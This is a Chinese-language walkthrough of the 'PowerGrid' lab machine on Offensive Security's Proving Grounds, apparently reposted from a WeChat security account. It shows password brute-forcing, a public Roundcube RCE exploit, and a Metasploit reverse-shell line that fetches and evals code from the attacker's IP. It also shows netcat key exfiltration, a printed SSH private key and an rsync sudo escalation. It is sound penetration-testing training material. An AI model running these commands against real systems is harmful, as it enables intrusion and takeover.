Proving Grounds靶场初尝 | PowerGrid

背景介绍

前阵子在网上冲浪时，发现有个up主在介绍他通过OSCP的经验，其中重点推荐了Proving Grounds这个靶机平台。Proving Grounds是由Offensive Security组织提供的在线靶机环境，分为Play / Pratice，后者需要付费，因此这次选择了Play中最难的一台靶机为大家试试水，总体体验还是挺不错的，推荐大家体验一下，链接：Proving Grounds: Virtual Pentesting Labs | Offensive Security (offensive-security.com)

开启靶机后，PG为靶机分配的IP为192.168.213.81，访问网站主页可以看到下图：

翻译一下这段信息，大意为：

我们已经黑进了欧洲每一个电网。
我们要求一笔250亿欧元的赎金（使用比特币支付）或者让这片大陆坠入黑暗。
这不是演习，如你们所见，我们已经试着用了我们的方法。
我们的比特币地址已经发送给你们的领导了，在我们把电源关掉并销毁证据之前你们有3个小时的时间，滴答，滴答，滴答。
来自Cymru1黑客团队的 deez1, p48 和 all2。

这里需要注意最后一段话，如果存在登录认证等场景可以使用deez1 / p48 / all2作为用户名进行密码爆破。

信息收集

在渗透测试中，最重要的是信息收集阶段，但由于靶场环境难以还原被动信息收集阶段，因此这里主要作主动信息收集，主动信息收集的常用手段就是子域名爆破、目录扫描、端口扫描和对应的服务识别，因此下面我们逐个来做。

1. 1. 使用Nmap进行端口扫描：

2. 2. 目录扫描（使用dirsearch进行目录扫描）python dirsearch.py --u "http://192.168.213.81/"

3. 3. 子域名爆破：由于靶机使用IP访问，不存在域名，这一步略过

初步的信息收集中，可以发现这是一台Linux主机，并且使用了Apache作为中间件，但意外地发现这台机器居然没有打开ssh端口，这是非常少见的情况。

到此为止信息收集的成果实在称不上有收获，因此使用feroxbuster + seclists进行大字典扫描：

结果多出来zmail，是一个登录入口：

枚举爆破

随意提交用户名密码，并通过BurpSuite进行抓包：

可以看到这个登录通过Authorization首部存放用户名密码，通过Base64解码可以得知用户名密码是以admin:admin的形式进行Base64编码后提交到服务器端的。

因此可以使用BurpSuite构造对应的payload进行密码爆破，操作如下：

• • 将数据包发送到Intruder模块之后，选择payload所在位置

• • 添加payload前缀并进行Base64编码（使用前面提到的三个用户名，爆破其他用户名则替换前缀）

• • 并载入密码字典（使用kali中自带的rockyou字典，是一个包含了一千多万条密码的字典）

• • 最后，记得取消勾选URL编码选项：

爆破结果：

经过漫长时间的密码爆破，得到了可用的账号密码p48 / electrico，再次用同样的账号密码登录：

利用RCE漏洞getshell

登录之后，在后台中发现了一封邮件，内容是这样的：

Listen carefully. We are close to our attack date. Nothing is going to stop us now. Our malware is heavily planted in each power grid across Europe. All it takes is a signal from this server after the timer has stopped, and nothing is going to stop that now. For information, I have setup a backup server located on the same network - you shouldn't need to access it for now, but if you do, scan for its local IP and use the SSH key encrypted below (it is encrypted with your GPG key, by the way). The backup server has root access to this main server - if you need to make any backups, I will leave it for you to work out how. I haven't got time to explain - we are too close to launching our hack.

-----BEGIN PGP MESSAGE-----

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
RO1va5L9lriZ1vmP37FxIwsrCVVcNrPJxWydvw==
=fPY9
-----END PGP MESSAGE-----

翻译一下，大致内容是这样的：仔细听，我们已经接近攻击日期了，现在没有什么可以阻止我们。我们的恶意软件已经深植于欧洲的每一个电网中，在计时器停止之后，它所需要只是来自这台服务器的一个信号，并且现在没有什么可以阻止它。关于这一块的信息，我已经设置了一个位于同一网络上的备份服务器 - 您现在不需要访问它，但是如果您这样做，请扫描本地IP并使用下面的SSH加密秘钥（顺带一说，它是用您的GPG密钥加密的）。备份服务器对这台主服务器有root权限 - 如果您需要任何备份，我将留给您解决方法。我没有时间解释了 - 我们离我们启动黑客攻击的时间太近了。

虽说如此，但我们并没有掌握备份服务器的任何信息，使用nmap对同一网段下的主机存活探测也没有别的结果，那就只能先拿下这台主机，点击左上角About可以发现服务器的一些信息：

用kali找一下相关漏洞（我倾向于先在MSF上搜索，但是没找到）：

第一个版本号一致，尝试使用第一个（使用-m参数复制到当前目录下，或使用-x参数打开阅读），阅读后发现只是漏洞介绍，网上资料还挺多的，下载github上的exp来使用：

git clone https://github.com/t0kx/exploit-CVE-2016-9920.git

修改一下这些部分（发信人和收信人）：

然后执行，可以看到后门已经被写入并且可以成功执行：

这里的内容除了参考Github之外，也参考了这份资料：https://paper.seebug.org/138/ 。

这一类靶机上都会存在flag，可以先找一下：

# 从根目录开始正则匹配flag文件，找到/var/www/flag1.txt
cmd=find / -name "flag*"
# 在Proving Grounds中，还有local和proof文件需要获得（需要提交这两个文件以证明打靶完成）
# 这里找到了local文件在/var/www/local.txt，但还看不到proof
cmd=find / -name "local*"
cmd=find / -name "proof*"
# 查看内容，提示了关键词pivoting，意思是跳板
cmd=cat /var/www/flag1.txt
Your flag is in another file... Are you any good at pivoting?

根据提示，我们需要进行跳板攻击。这里和通过Vulnhub来对这台主机进行渗透的差别就出来了，因为kali和PowerGrid处于同一网络中，但现在并不是这样，因此我想出了以下几种方案：

• • 使用Proving Ground提供的浏览器端Kali进行渗透，缺点是不够流畅

• • 使用Pivoting技术进行跳板攻击，将主机作为跳板机进行内网穿透，缺点是操作繁琐，连接不够稳定

• • Kali挂载OpenVPN，可以直接访问

第三个方案显然比较容易实施，因此我们在kali中执行这条命令sudo openvpn pg.ovpn，让kali访问到靶机，然后利用这个RCE漏洞进行反弹shell，这里我反弹到了MSF中：

# MSF中的web_delivery模块，在服务器端拥有RCE漏洞时可以用于反弹shell
use multi/script/web_delivery
set payload php/meterpreter/reverse_tcp
set LHOST <OpenVPN分配的本地IP>
set target PHP
exploit
# 返回的payload，通过RCE漏洞执行即可
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.49.136:8080/XviucWym', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"

可以看到，meterpreter已经成功弹回，执行shell命令以进入shell。

在Docker中进行权限提升

通过GPG解密得到SSH私钥并连接到Docker中。

这时，我们可以尝试利用之前的p48账户进行登录，看看能否获得更多信息：

# 升级shell
python -c 'import pty; pty.spawn("/bin/bash")'
# 切换用户，密码electrico，成功登录
su p48
# 切换到p48用户目录下，发现了一个私钥文件和一个邮箱文件夹
cd ~
ls -al
# 将privkey文件通过1234端口转发出去
nc -lvp 1234 < privkey.gpg
# 本机接收
nc <Target IP> 1234 > p48.gpg

这里得到了一个gpg私钥，还记得之前那封邮件吗？它是用gpg私钥加密得到的，那么我们就尝试可以通过这个私钥进行解密：

# 导入私钥（输入口令electrico）
gpg --import privkey.gpg
# 利用私钥解密信息，得到SSH的key
gpg -o id_rsa --decrypt message

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

这里就又有一个问题了，这个SSH私钥用于连接哪台主机？看一下网卡信息就明白了，docker容器的IP网段为172.17.0.0/16：

这时候需要通过shell命令循环进行ping以代替主机存活扫描的操作（nmap甚至arping在主机上都不存在，并且ARP扫描需要root权限），因此只能通过这个方法进行主机存活扫描，这里为了节约时间，先扫/24网段：

for i in {1..254} ; do ping -c 1 172.17.0.$i &>/dev/null && echo "172.17.0.$i is alive" || echo "172.17.0.$i is down"; done

发现172.17.0.2存活，将SSH私钥传递到主机上，并连接172.17.0.2：

# 本地将id_rsa传递到1234端口
nc -lvp 1234 < id_rsa
# webshell接收id_rsa
nc <kali的IP> 1234 > id_rsa
# 给予权限，否则会报警告Warning: Identity file rsa_id not accessible: No such file or directory.
chmod 600 id_rsa
ssh -i id_rsa [email protected]
# 成功登录，判断当前目录并列出文件，得到flag2，提示该用户权限不足
pwd
ls -al
cat flag2.txt

尝试sudo -l提权，发现rsync命令可以免密码以root权限执行，并且搜索引擎查询到了提权方法，参考资料：https://gtfobins.github.io/gtfobins/rsync/ ：

# 列出可以免密sudo的程序
sudo -l
# 提升权限
sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null

这里并没有给出flag，而是提示Are you any good at pivoting backwards?，你擅长向后作跳板吗？什么意思？我们再登录回之前的172.17.0.1的主机吗？尝试一下：

cd .ssh
ssh -i id_rsa [email protected]
pwd
cat flag4.txt
cat proof.txt

总结

从最开始相对完整的靶机侦查、信息收集，我们利用端口扫描、目录扫描技术探测到了可以利用的zmail登录入口，通过枚举爆破技术实现了弱口令登录，再到后台历史漏洞RCE发掘漏洞及其利用，利用p48账户找到私钥并连接到Docker容器，通过Docker提权并定位到另一个SSH私钥跳回到本机提升为root，完成了整个打靶过程。

原文始发于微信公众号（格物安全）：Proving Grounds靶场初尝 | PowerGrid